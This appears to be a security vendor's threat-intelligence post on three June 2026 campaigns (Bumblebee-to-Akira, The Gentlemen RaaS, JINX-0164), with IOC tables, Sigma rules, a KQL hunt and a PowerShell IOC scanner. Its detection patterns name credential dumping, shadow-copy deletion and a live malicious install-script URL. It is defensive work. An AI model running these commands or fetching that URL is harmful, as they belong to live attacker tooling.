Three OTX pulses published between June 27–30, 2026 reveal a converging threat landscape where initial access brokers, ransomware affiliates, and supply chain attackers are operating simultaneously across different attack surfaces:
-
Bumblebee → AdaptixC2 → Akira Ransomware Chain: An SEO poisoning campaign abused Bing search results to deliver trojanized ManageEngine OpManager installers. Users searching for legitimate IT management tools were served malicious downloads that deployed Bumblebee loader, establishing AdaptixC2 command-and-control channels. Attackers exploited the fact that IT administrators were executing these tools, enabling rapid lateral movement via RustDesk, credential dumping, and ultimately Akira ransomware deployment.
-
The Gentlemen RaaS Expansion: Emerging as a top-10 ransomware threat actor in H1 2026, The Gentlemen exploit vulnerabilities in internet-facing VPNs and firewalls, potentially leveraging initial access brokers. Their toolkit includes SharkLoader, Cobalt Strike, MgBot, AppleSeed, and multiple custom loaders. They conduct comprehensive reconnaissance using SharpADWS, NetScan, and Advanced IP Scanner, capture network traffic with netsh, and deploy ransomware via GPO — targeting manufacturing, technology, healthcare, finance, construction, and transportation sectors across Brazil, China, Indonesia, Taiwan, and Thailand.
-
JINX-0164 Cryptocurrency Supply Chain Attacks: A financially motivated actor targeting cryptocurrency organizations' software development infrastructure since mid-2025. JINX-0164 uses LinkedIn social engineering to deliver custom macOS malware — AUDIOFIX (Python-based infostealer/RAT) and MINIRAT (Go backdoor) — while also conducting NPM supply chain attacks and CI/CD pipeline hijacking to compromise developer environments.
Collectively, these campaigns demonstrate threat actors exploiting trusted software distribution channels (SEO, NPM), targeting privileged users (IT admins, developers), and using modular payload architectures to achieve financial objectives through ransomware or data theft.
Threat Actor / Malware Profile
Bumblebee (S1039) → AdaptixC2 → Akira
| Attribute | Detail |
|---|---|
| Distribution | SEO poisoning on Bing; trojanized ManageEngine OpManager and Angry IP Scanner installers hosted on lookalike domains (opmanager.pro, angryipscanner.org) |
| Initial Access | User-executed trojanized installer (T1204.002 — Malicious File) |
| Loader Behavior | Bumblebee DLL loading via regsvr32 or rundll32; reflective DLL injection into legitimate processes |
| C2 Framework | AdaptixC2 — HTTPS beaconing with jittered intervals; traffic blended with legitimate web patterns |
| Lateral Movement | RustDesk deployment for interactive remote access; SMB share enumeration; PsExec-style execution |
| Credential Access | LSASS memory dumping; NTDS.dit extraction; credential reuse across hosts (T1003) |
| Impact | Akira ransomware deployment — file encryption with .akira extension; shadow copy deletion via vssadmin/wmic (T1486) |
| Anti-Analysis | DLL execution from temp directories; delayed execution; environment keying to avoid sandbox detonation |
The Gentlemen RaaS
| Attribute | Detail |
|---|---|
| Distribution | Exploitation of internet-facing VPN/firewall vulnerabilities (T1190); potential initial access broker collaboration |
| Reconnaissance | SharpADWS for Active Directory enumeration via web services; NetScan and Advanced IP Scanner for network discovery (T1046); netsh trace for packet capture (T1040) |
| Loaders & Implants | SharkLoader (multi-stage loader), Cobalt Strike (S0154), MgBot (modular framework), AppleSeed (S0622 backdoor), CoolClient (persistence agent), ZiChatBot (communication), PowerCloud (cloud-aware module), ReverseSocks (proxy infrastructure) |
| Lateral Movement | GPO-based deployment across domain-joined systems (T1570); vulnerable driver exploitation for privilege escalation |
| Persistence | Scheduled tasks, GPO-deployed binaries, Windows services via CoolClient |
| Impact | File encryption with variant-specific extension; double extortion model (T1486) |
| Targeting | Manufacturing, Technology, Healthcare, Finance, Construction, Transportation; geographic focus on Brazil, China, Indonesia, Taiwan, Thailand |
JINX-0164
| Attribute | Detail |
|---|---|
| Distribution | LinkedIn social engineering (posing as recruiters/business partners); NPM trojanized packages; CI/CD pipeline hijacking (T1195) |
| Payload — AUDIOFIX | Python-based infostealer and RAT; targets cryptocurrency wallets, SSH keys, browser credentials; exfiltrates via HTTPS to attacker-controlled domains (driver-updater.net, live.ong) |
| Payload — MINIRAT | Lightweight Go backdoor; establishes persistent reverse shell; uses legitimate-looking domains (login.teamicrosoft.com, teams.live.us.org) for C2 |
| C2 Infrastructure | Typosquatted Microsoft/Teams domains; IP-based C2 at 89.36.224.5; install script hosted at http://89.36.224.5/troubleshoot/mac/install.sh |
| Persistence | LaunchAgent/LaunchDaemon plists (macOS); cron jobs; hidden shell scripts in user directories |
| Anti-Analysis | Execution from temporary directories; delayed beaconing; environment checks before payload activation |
| Objective | Cryptocurrency theft; source code exfiltration; persistent access to CI/CD pipelines for secondary supply chain compromises |
IOC Analysis
The three pulses collectively contribute 162 indicators (22 + 48 + 92) across multiple indicator types:
Indicator Breakdown
| Type | Count | Key Examples | Operational Use |
|---|---|---|---|
| IPv4 | 2+ | 172.96.137.160, 89.36.224.5 | Firewall egress rules, EDR network telemetry, proxy logs |
| Domain | 4+ | angryipscanner.org, opmanager.pro, driver-updater.net, live.ong | DNS sinkholing, web proxy blocks, email gateway filtering |
| Hostname | 4+ | login.teamicrosoft.com, teams.live.us.org, rsat.activedirectory.ds-lds.tools | DNS response policy zones, TLS SNI inspection, proxy URL filtering |
| URL | 1+ | http://89.36.224.5/troubleshoot/mac/install.sh | Web proxy blocks, IDS signature matching, EDR download monitoring |
| FileHash-SHA256 | 4+ | a14506c6…, f8965fdc…, 5af1dae2…, b6cab0b3… | EDR block lists, AV signatures, file integrity monitoring |
| FileHash-MD5 | 4+ | a746da51…, bcee0ab1…, 9321a61a…, b6b51508… | Legacy AV engines, SIEM correlation rules |
| FileHash-SHA1 | 4+ | 1b9aa401…, f352cec8…, 6afc6b04…, 96f0dbf5… | Certificate pinning validation, binary reputation checks |
Operationalization Guidance
SOC teams should deploy these IOCs across the following layers:
-
Network Layer: Feed all IPs, domains, and hostnames into SIEM threat intelligence platforms (AlienVault OTX direct import, MISP, ThreatConnect). Configure IDS/IPS (Suricata, Snort, Zeek) with custom rules for domain and IP matching. Deploy DNS response policy zones for domain-based blocking.
-
Endpoint Layer: Push all SHA256 hashes to EDR platforms (CrowdStrike, Defender for Endpoint, SentinelOne) as blocklists. Create custom detection rules for MD5/SHA1 hashes on legacy systems. Monitor for RustDesk executable deployment in non-standard directories.
-
Cloud/Email Layer: Configure email gateways to block messages containing links to typosquatted domains (login.teamicrosoft.com, teams.live.us.org). Deploy CASB rules for unsanctioned SaaS applications matching C2 domains.
-
Developer Infrastructure: Scan NPM registries and CI/CD pipelines for indicators matching JINX-0164 infrastructure. Implement package allowlisting and signed package verification.
Detection Engineering
Sigma Rules
---
title: Bumblebee Loader Execution via Trojanized IT Management Installer
id: 7a3c1f2e-8b4d-4a6e-9c2f-1d5e7a3b9c4f
status: experimental
description: >
Detects Bumblebee malware execution patterns originating from trojanized
IT management tool installers (ManageEngine OpManager, Angry IP Scanner)
delivered via SEO poisoning, followed by AdaptixC2 beaconing and Akira
ransomware staging activity.
references:
- https://thedfirreport.com/2025/08/05/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira-2/
author: Security Arsenal Threat Intelligence
date: 2026/06/30
tags:
- attack.execution
- attack.t1204.002
- attack.credential_access
- attack.t1003
- attack.lateral_movement
- attack.t1021.002
logsource:
product: windows
category: process_creation
detection:
selection_loader:
Image|endswith:
- '\\rundll32.exe'
- '\\regsvr32.exe'
CommandLine|contains:
- 'AppData\\Local\\Temp'
- 'ProgramData'
- 'Public\\'
selection_installer_source:
ParentImage|contains:
- 'OpManager'
- 'opmanager'
- 'AngryIPScanner'
- 'angryip'
ParentImage|endswith:
- '\\setup.exe'
- '\\installer.exe'
- '\\msiexec.exe'
selection_rustdesk:
Image|endswith:
- '\\rustdesk.exe'
CommandLine|contains:
- '--password'
- '--connect'
- '--get-id'
selection_credential_dump:
Image|endswith:
- '\\procdump.exe'
- '\\ntdsutil.exe'
CommandLine|contains:
- 'lsass'
- 'ntds'
- 'minidump'
selection_akira_staging:
Image|endswith:
- '\\vssadmin.exe'
- '\\wmic.exe'
- '\\wbadmin.exe'
CommandLine|contains:
- 'delete shadows'
- 'shadowcopy delete'
- 'delete catalog'
condition: (selection_loader and selection_installer_source) or selection_rustdesk or selection_credential_dump or selection_akira_staging
fields:
- Image
- CommandLine
- ParentImage
- User
- ComputerName
falsepositives:
- Legitimate RustDesk administration (verify with IT ops)
- Authorized credential auditing tools
- Legitimate shadow copy maintenance during backups
level: high
---
title: The Gentlemen RaaS Reconnaissance and Lateral Movement via GPO
id: 9e2b4c7a-1f3d-5a8e-b6c4-2d8f0a1e3b5c
status: experimental
description: >
Detects reconnaissance and lateral movement techniques associated with
The Gentlemen ransomware-as-a-service group, including netsh packet
capture, SharpADWS Active Directory enumeration, network scanning tools,
and GPO-based malicious deployment across domain-joined systems.
references:
- https://securelist.com/the-gentlemen-raas/120447/
author: Security Arsenal Threat Intelligence
date: 2026/06/30
tags:
- attack.discovery
- attack.t1046
- attack.t1040
- attack.lateral_movement
- attack.t1570
- attack.t1486
logsource:
product: windows
category: process_creation
detection:
selection_netsh_trace:
Image|endswith: '\\netsh.exe'
CommandLine|contains:
- 'trace start'
- 'capture start'
selection_ad_enum:
Image|endswith:
- '\\SharpADWS.exe'
- '\\powershell.exe'
- '\\pwsh.exe'
CommandLine|contains:
- 'SharpADWS'
- 'ActiveDirectory.WebServices'
- 'Get-ADUser'
- 'Get-ADComputer'
- 'Get-ADGroupMember'
selection_network_scan:
Image|endswith:
- '\\netscan.exe'
- '\\advanced_ip_scanner.exe'
- '\\nmap.exe'
CommandLine|contains:
- '/scan'
- '-sV'
- '--range'
selection_gpo_deploy:
Image|endswith:
- '\\powershell.exe'
- '\\pwsh.exe'
- '\\cmd.exe'
CommandLine|contains:
- 'New-GPO'
- 'Set-GPPrefRegistryValue'
- 'New-GPLink'
- 'gpupdate /force'
- '\\SYSVOL\\'
selection_cobalt_strike:
Image|endswith:
- '\\rundll32.exe'
- '\\powershell.exe'
CommandLine|contains:
- 'ampoline'
- 'start-thread'
- 'FreeLibrary'
- 'VirtualAlloc'
condition: selection_netsh_trace or selection_ad_enum or selection_network_scan or selection_gpo_deploy or selection_cobalt_strike
fields:
- Image
- CommandLine
- ParentImage
- User
- ComputerName
falsepositives:
- Authorized network troubleshooting with netsh trace
- Legitimate AD administration tools
- Approved network scanning by security team
- GPO deployment by authorized sysadmins
level: high
---
title: JINX-0164 AUDIOFIX and MINIRAT Execution on macOS Developer Systems
id: 3f7a9c2e-5b1d-4e8f-a3c6-9d2b7e4f1a8c
status: experimental
description: >
Detects execution of AUDIOFIX (Python infostealer/RAT) and MINIRAT
(Go backdoor) malware delivered by JINX-0164 threat actor targeting
cryptocurrency developer infrastructure via LinkedIn social engineering
and NPM supply chain attacks.
references:
- https://www.wiz.io/blog/threat-actors-target-crypto-orgs
author: Security Arsenal Threat Intelligence
date: 2026/06/30
tags:
- attack.execution
- attack.t1059.006
- attack.t1195.002
- attack.command_and_control
- attack.t1105
logsource:
product: macos
category: process_creation
detection:
selection_audiofix_python:
Image|endswith:
- '/python3'
- '/python'
CommandLine|contains:
- 'audiofix'
- 'troubleshoot/mac/install.sh'
- 'driver-updater.net'
- 'live.ong'
selection_minirat_go:
Image|endswith:
- '/main'
- '/minirat'
- '/client'
ParentImage|contains:
- '/tmp/'
- '/var/tmp/'
- '/Users/'
- '/Library/Application Support/'
selection_c2_domain:
CommandLine|contains:
- 'login.teamicrosoft.com'
- 'teams.live.us.org'
- 'www.driver-updater.net'
- 'www.live.us.org'
- '89.36.224.5'
selection_install_script:
Image|endswith:
- '/sh'
- '/bash'
- '/curl'
- '/wget'
CommandLine|contains:
- 'install.sh'
- 'troubleshoot/mac/'
- 'curl http://89.36.224.5'
selection_npm_suspicious:
Image|endswith:
- '/npm'
- '/node'
CommandLine|contains:
- 'postinstall'
- 'preinstall'
- 'child_process'
- 'exec('
- 'spawn('
condition: selection_audiofix_python or selection_minirat_go or selection_c2_domain or selection_install_script or selection_npm_suspicious
fields:
- Image
- CommandLine
- ParentImage
- User
- ComputerName
falsepositives:
- Legitimate Python development scripts (verify context)
- Authorized npm package installation
- DevOps CI/CD scripts with similar patterns
level: high
KQL Hunt Query — Microsoft Sentinel
// Triple Threat IOC Hunt: Bumblebee/Akira + Gentlemen RaaS + JINX-0164
// Run in Microsoft Sentinel Log Analytics workspace
let Pulse1_Hashes = dynamic([
"a14506c6fb92a5af88a6a44d273edafe10d69ee3d85c8b2a7ac458a22edf68d2",
"a746da514c90f26a187a294fda7edc1b",
"bcee0ab10b23f5999bcdb56c0b4a631a",
"1b9aa401457d29405c0bcf19cbf19a7028a0d214",
"f352cec89a56e23dae20cdd62df4d40bc7f22b5e"
]);
let Pulse2_Hashes = dynamic([
"9321a61a25c7961d9f36852ecaa86f55",
"6afc6b04cf73dd461e4a4956365f25c1f1162387",
"f8965fdce668692c3785afa3559159f9a18287bc0d53abb21902895a8ecf221b",
"5af1dae21425dda8311a2044209c308525135e1733eeff5dd20649946c6e054c",
"b6b51508ad6f462c45fe102c85d246c8",
"96f0dbf52aed0afd43e44500116b04b674f7358e",
"7556ae58c215b8245a43f764f0676c7a8f0fdd1a"
]);
let Pulse3_Hashes = dynamic([
"b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17"
]);
let AllHashes = array_concat(Pulse1_Hashes, Pulse2_Hashes, Pulse3_Hashes);
let MaliciousDomains = dynamic([
"angryipscanner.org", "opmanager.pro", "driver-updater.net",
"live.ong", "login.teamicrosoft.com", "teams.live.us.org",
"www.driver-updater.net", "www.live.us.org",
"rsat.activedirectory.ds-lds.tools"
]);
let MaliciousIPs = dynamic(["172.96.137.160", "89.36.224.5"]);
// --- Process hash matches ---
DeviceProcessEvents
| where SHA256 in (AllHashes) or MD5 in (AllHashes) or SHA1 in (AllHashes)
| extend ThreatGroup = case(
SHA256 in (Pulse1_Hashes) or MD5 in (Pulse1_Hashes) or SHA1 in (Pulse1_Hashes), "Bumblebee/Akira",
SHA256 in (Pulse2_Hashes) or MD5 in (Pulse2_Hashes) or SHA1 in (Pulse2_Hashes), "Gentlemen RaaS",
SHA256 in (Pulse3_Hashes) or MD5 in (Pulse3_Hashes) or SHA1 in (Pulse3_Hashes), "JINX-0164",
"Unknown"
)
| project Timestamp, DeviceName, ThreatGroup, FileName, FolderPath, SHA256, MD5, SHA1, InitiatingProcessFileName, AccountName
| union (
// --- Network connections to malicious infrastructure ---
DeviceNetworkEvents
| where RemoteIP in (MaliciousIPs)
or RemoteUrl has any (MaliciousDomains)
or RemoteUrl has "89.36.224.5/troubleshoot/mac/install.sh"
| extend ThreatGroup = case(
RemoteIP == "172.96.137.160" or RemoteUrl has "angryipscanner" or RemoteUrl has "opmanager.pro", "Bumblebee/Akira",
RemoteIP == "89.36.224.5" or RemoteUrl has "driver-updater" or RemoteUrl has "live.ong" or RemoteUrl has "teamicrosoft", "JINX-0164",
RemoteUrl has "rsat.activedirectory", "Gentlemen RaaS",
"Unknown"
)
| project Timestamp, DeviceName, ThreatGroup, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessAccountName
)
| union (
// --- Behavioral detections: recon, credential dumping, lateral movement ---
DeviceProcessEvents
| where
(FileName =~ "netsh.exe" and ProcessCommandLine has "trace" and ProcessCommandLine has "start")
or (ProcessCommandLine has "SharpADWS" or ProcessCommandLine has "ActiveDirectory.WebServices")
or (ProcessCommandLine has "New-GPO" or ProcessCommandLine has "Set-GPPrefRegistryValue" or ProcessCommandLine has "New-GPLink")
or (FileName =~ "rustdesk.exe" and (ProcessCommandLine has "--password" or ProcessCommandLine has "--connect"))
or (ProcessCommandLine has "lsass" and ProcessCommandLine has "dump")
or (ProcessCommandLine has "ntdsutil" and ProcessCommandLine has "active instance")
or (FileName =~ "vssadmin.exe" and ProcessCommandLine has "delete shadows")
or (FileName =~ "wmic.exe" and ProcessCommandLine has "shadowcopy delete")
| extend ThreatGroup = case(
FileName =~ "netsh.exe" or ProcessCommandLine has "SharpADWS" or ProcessCommandLine has "New-GPO", "Gentlemen RaaS",
FileName =~ "rustdesk.exe", "Bumblebee/Akira",
ProcessCommandLine has "lsass" or ProcessCommandLine has "ntdsutil", "Bumblebee/Akira",
FileName =~ "vssadmin.exe" or FileName =~ "wmic.exe", "Bumblebee/Akira (Akira Ransomware)",
"Unknown"
)
| project Timestamp, DeviceName, ThreatGroup, FileName, ProcessCommandLine, InitiatingProcessFileName, AccountName
)
| order by Timestamp desc
IOC Hunt Script — PowerShell
<#
.SYNOPSIS
Triple Threat IOC Hunt: Bumblebee/Akira + Gentlemen RaaS + JINX-0164
.DESCRIPTION
Hunts for file hashes, network connections, scheduled tasks, RustDesk
deployment, netsh packet captures, and registry persistence associated
with three active OTX threat pulses from June 2026.
#>
$ErrorActionPreference = "SilentlyContinue"
# === IOC Definitions ===
$HashIOCs = @(
@{Hash="a14506c6fb92a5af88a6a44d273edafe10d69ee3d85c8b2a7ac458a22edf68d2"; Algo="SHA256"; Threat="Bumblebee/Akira"},
@{Hash="a746da514c90f26a187a294fda7edc1b"; Algo="MD5"; Threat="Bumblebee/Akira"},
@{Hash="bcee0ab10b23f5999bcdb56c0b4a631a"; Algo="MD5"; Threat="Bumblebee/Akira"},
@{Hash="1b9aa401457d29405c0bcf19cbf19a7028a0d214"; Algo="SHA1"; Threat="Bumblebee/Akira"},
@{Hash="f352cec89a56e23dae20cdd62df4d40bc7f22b5e"; Algo="SHA1"; Threat="Bumblebee/Akira"},
@{Hash="f8965fdce668692c3785afa3559159f9a18287bc0d53abb21902895a8ecf221b"; Algo="SHA256"; Threat="Gentlemen RaaS"},
@{Hash="5af1dae21425dda8311a2044209c308525135e1733eeff5dd20649946c6e054c"; Algo="SHA256"; Threat="Gentlemen RaaS"},
@{Hash="9321a61a25c7961d9f36852ecaa86f55"; Algo="MD5"; Threat="Gentlemen RaaS"},
@{Hash="b6b51508ad6f462c45fe102c85d246c8"; Algo="MD5"; Threat="Gentlemen RaaS"},
@{Hash="b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17"; Algo="SHA256"; Threat="JINX-0164"}
)
$NetworkIOCs = @(
@{Indicator="172.96.137.160"; Type="IP"; Threat="Bumblebee/Akira"},
@{Indicator="89.36.224.5"; Type="IP"; Threat="JINX-0164"},
@{Indicator="angryipscanner.org"; Type="Domain"; Threat="Bumblebee/Akira"},
@{Indicator="opmanager.pro"; Type="Domain"; Threat="Bumblebee/Akira"},
@{Indicator="driver-updater.net"; Type="Domain"; Threat="JINX-0164"},
@{Indicator="live.ong"; Type="Domain"; Threat="JINX-0164"},
@{Indicator="login.teamicrosoft.com"; Type="Hostname"; Threat="JINX-0164"},
@{Indicator="teams.live.us.org"; Type="Hostname"; Threat="JINX-0164"},
@{Indicator="rsat.activedirectory.ds-lds.tools"; Type="Hostname"; Threat="Gentlemen RaaS"}
)
Write-Host "`n=== TRIPLE THREAT IOC HUNT — June 2026 OTX Pulses ===" -ForegroundColor Cyan
Write-Host "Scan Start: $(Get-Date -Format 'yyyy-MM-dd HH:mm:ss')`n"
$findings = 0
# 1. Process Hash Scanning
Write-Host "[1/6] Scanning running processes for malicious file hashes..." -ForegroundColor Yellow
$procs = Get-Process | Where-Object { $_.Path -and $_.Path -ne "" }
foreach ($proc in $procs) {
try {
$sha256 = (Get-FileHash -Path $proc.Path -Algorithm SHA256).Hash
$md5 = (Get-FileHash -Path $proc.Path -Algorithm MD5).Hash
$sha1 = (Get-FileHash -Path $proc.Path -Algorithm SHA1).Hash
foreach ($ioc in $HashIOCs) {
$computedHash = if ($ioc.Algo -eq "SHA256") { $sha256 } elseif ($ioc.Algo -eq "MD5") { $md5 } else { $sha1 }
if ($computedHash -eq $ioc.Hash) {
Write-Host " [!] CRITICAL: $($proc.ProcessName) matches $($ioc.Algo) — Threat: $($ioc.Threat)" -ForegroundColor Red
Write-Host " PID: $($proc.Id) | Path: $($proc.Path)" -ForegroundColor Red
$findings++
}
}
} catch {}
}
# 2. Network Connection Scanning
Write-Host "`n[2/6] Checking active network connections against IOC list..." -ForegroundColor Yellow
$conns = Get-NetTCPConnection -State Established
$dnsCache = Get-DnsClientCache
foreach ($conn in $conns) {
$remoteIP = $conn.RemoteAddress
$procInfo = Get-Process -Id $conn.OwningProcess -ErrorAction SilentlyContinue
foreach ($ioc in $NetworkIOCs | Where-Object { $_.Type -eq "IP" }) {
if ($remoteIP -eq $ioc.Indicator) {
Write-Host " [!] CRITICAL: Connection to $($ioc.Indicator):$($conn.RemotePort) — Threat: $($ioc.Threat)" -ForegroundColor Red
Write-Host " Process: $($procInfo.ProcessName) (PID: $($conn.OwningProcess))" -ForegroundColor Red
$findings++
}
}
foreach ($ioc in $NetworkIOCs | Where-Object { $_.Type -in @("Domain","Hostname") }) {
$resolvedIPs = $dnsCache | Where-Object { $_.Entry -eq $ioc.Indicator } | Select-Object -ExpandProperty Data
if ($resolvedIPs -contains $remoteIP) {
Write-Host " [!] CRITICAL: Domain $($ioc.Indicator) resolved to $remoteIP — Threat: $($ioc.Threat)" -ForegroundColor Red
Write-Host " Process: $($procInfo.ProcessName) (PID: $($conn.OwningProcess))" -ForegroundColor Red
$findings++
}
}
}
# 3. RustDesk Detection (Bumblebee Lateral Movement)
Write-Host "`n[3/6] Scanning for RustDesk installation (Bumblebee lateral movement tool)..." -ForegroundColor Yellow
$rustdeskLocations = @(
"C:\Program Files\RustDesk",
"C:\Program Files (x86)\RustDesk",
"$env:APPDATA\RustDesk",
"$env:LOCALAPPDATA\RustDesk",
"$env:ProgramData\RustDesk"
)
foreach ($loc in $rustdeskLocations) {
if (Test-Path $loc) {
$exe = Get-ChildItem -Path $loc -Filter "rustdesk.exe" -Recurse -ErrorAction SilentlyContinue
if ($exe) {
Write-Host " [!] WARNING: RustDesk found at $loc" -ForegroundColor Red
Write-Host " Verify with IT operations — Bumblebee abuses RustDesk for lateral movement" -ForegroundColor Yellow
$findings++
}
}
}
$rustdeskProc = Get-Process -Name "rustdesk" -ErrorAction SilentlyContinue
if ($rustdeskProc) {
Write-Host " [!] WARNING: RustDesk is currently running (PID: $($rustdeskProc.Id -join ', '))" -ForegroundColor Red
$findings++
}
# 4. Netsh Trace Detection (Gentlemen RaaS Network Capture)
Write-Host "`n[4/6] Checking for active netsh packet captures (Gentlemen RaaS recon)..." -ForegroundColor Yellow
$netshProcs = Get-Process -Name "netsh" -ErrorAction SilentlyContinue
if ($netshProcs) {
Write-Host " [!] CRITICAL: netsh process running — potential packet capture by Gentlemen RaaS" -ForegroundColor Red
$findings++
}
# 5. Scheduled Task Persistence Scanning
Write-Host "`n[5/6] Scanning scheduled tasks for persistence mechanisms..." -ForegroundColor Yellow
$tasks = Get-ScheduledTask | Where-Object { $_.State -ne "Disabled" -and $_.TaskPath -notmatch "\\Microsoft\\" }
foreach ($task in $tasks) {
foreach ($action in $task.Actions) {
$cmdString = "$($action.Execute) $($action.Arguments)"
if ($cmdString -match "http[s]?://|\.ps1|\.bat|\.vbs|Base64|DownloadString|Invoke-Expression|rundll32|regsvr32|AppData") {
Write-Host " [!] SUSPICIOUS TASK: $($task.TaskName)" -ForegroundColor Red
Write-Host " Command: $cmdString" -ForegroundColor Red
Write-Host " Path: $($task.TaskPath)" -ForegroundColor Red
$findings++
}
}
}
# 6. Registry Run Key Persistence
Write-Host "`n[6/6] Scanning registry Run keys for malicious persistence..." -ForegroundColor Yellow
$regPaths = @(
"HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
"HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
"HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run"
)
foreach ($rp in $regPaths) {
$props = Get-ItemProperty -Path $rp -ErrorAction SilentlyContinue
if ($props) {
foreach ($p in $props.PSObject.Properties | Where-Object { $_.Name -notmatch "^PS" }) {
if ($p.Value -match "http|\.ps1|\.bat|\.vbs|rundll32|regsvr32|AppData|powershell.*-enc|cmd\.exe.*/c") {
Write-Host " [!] SUSPICIOUS REGISTRY: $($p.Name) = $($p.Value)" -ForegroundColor Red
Write-Host " Key: $rp" -ForegroundColor Red
$findings++
}
}
}
}
# Summary
Write-Host "`n=== SCAN COMPLETE: $findings finding(s) detected ===" -ForegroundColor $(if ($findings -gt 0) {"Red"} else {"Green"})
Write-Host "Scan End: $(Get-Date -Format 'yyyy-MM-dd HH:mm:ss')`n" -ForegroundColor Cyan
if ($findings -gt 0) {
Write-Host "[!] IMMEDIATE ACTION REQUIRED: Review all flagged items above." -ForegroundColor Red
Write-Host "[!] Isolate affected systems and escalate to IR team." -ForegroundColor Red
} else {
Write-Host "[+] No indicators matched. Continue monitoring." -ForegroundColor Green
}
---
Response Priorities
Immediate (0–4 hours)
- Block all IP and domain IOCs at firewalls, web proxies, and DNS resolvers: 172.96.137.160, 89.36.224.5, angryipscanner.org, opmanager.pro, driver-updater.net, live.ong, and all typosquatted hostnames (login.teamicrosoft.com, teams.live.us.org, www.driver-updater.net, www.live.us.org)
- Deploy file hash blocklists to EDR/SIEM across all endpoints — all 162 indicators should be ingested as high-confidence detections
- Hunt for Bumblebee execution artifacts: rundll32/regsvr32 executing from temp directories, RustDesk binaries in non-standard paths, scheduled tasks with encoded PowerShell commands
- Hunt for Gentlemen RaaS reconnaissance: active netsh trace sessions, SharpADWS executions, recent GPO modifications, network scanner deployments (NetScan, Advanced IP Scanner)
- Hunt for JINX-0164 activity: Python/Go binaries executing from temp directories on macOS endpoints, connections to 89.36.224.5, NPM post-install scripts with network calls to external domains
- Block the malicious install script URL:
http://89.36.224.5/troubleshoot/mac/install.shat all web gateways and proxies
24 Hours
- Credential verification and reset: If Bumblebee or AUDIOFIX is detected, assume credential compromise — force password resets for all local admin accounts, domain admin accounts, and service accounts on affected segments. Rotate any cached credentials in LSASS
- Session token invalidation: For JINX-0164 cryptocurrency sector targets, invalidate all active session tokens for developer platforms (GitHub, GitLab, CI/CD systems, cloud consoles). Rotate API keys and deployment credentials
- RustDesk audit: Inventory all RustDesk installations organization-wide. Validate each against IT-approved software manifests. Quarantine any unauthorized instances immediately
- AD integrity check: If Gentlemen RaaS indicators are present, audit Group Policy Objects for unauthorized modifications, check for newly created GPOs, and review SYSVOL for unexpected scripts or binaries
- NPM package audit: For developer environments, scan package-lock. files for any dependencies resolving to known malicious packages. Implement package allowlisting and verify package integrity signatures
1 Week
- SEO poisoning awareness training: Educate IT staff that Bing/Google search results for IT management tools may be poisoned. Establish an official software download portal with hash verification for tools like ManageEngine OpManager, Angry IP Scanner, and RustDesk
- VPN/firewall hardening: Patch all internet-facing VPN concentrators and firewalls to latest firmware. Implement network-level authentication (NLA) for all remote access. The Gentlemen group specifically targets these devices for initial access — review and close any externally exposed management interfaces
- GPO security hardening: Implement GPO change auditing with real-time alerting. Restrict GPO creation and modification to break-glass accounts with MFA. Deploy a GPO change monitoring solution that alerts on new GPO creation, GPO link changes, and SYSVOL modifications
- macOS endpoint hardening: For organizations with developer Mac fleets, deploy MDM-enforced application allowlisting (Gatekeeper + notarization requirements), disable automatic execution of downloaded scripts, and implement EDR coverage for macOS with LaunchAgent/LaunchDaemon persistence detection
- Supply chain controls: Implement NPM package signing and verification, pin dependency versions with integrity hashes, and deploy dependency confusion attack detection. Enforce CI/CD pipeline secret scanning and branch protection rules
- Threat intelligence integration: Subscribe to AlienVault OTX pulses for Bumblebee, The Gentlemen, and JINX-0164 threat actors. Configure automated IOC ingestion into SIEM/EDR platforms with hourly refresh cadence
Related Resources
Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub
Is your security operations ready?
Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.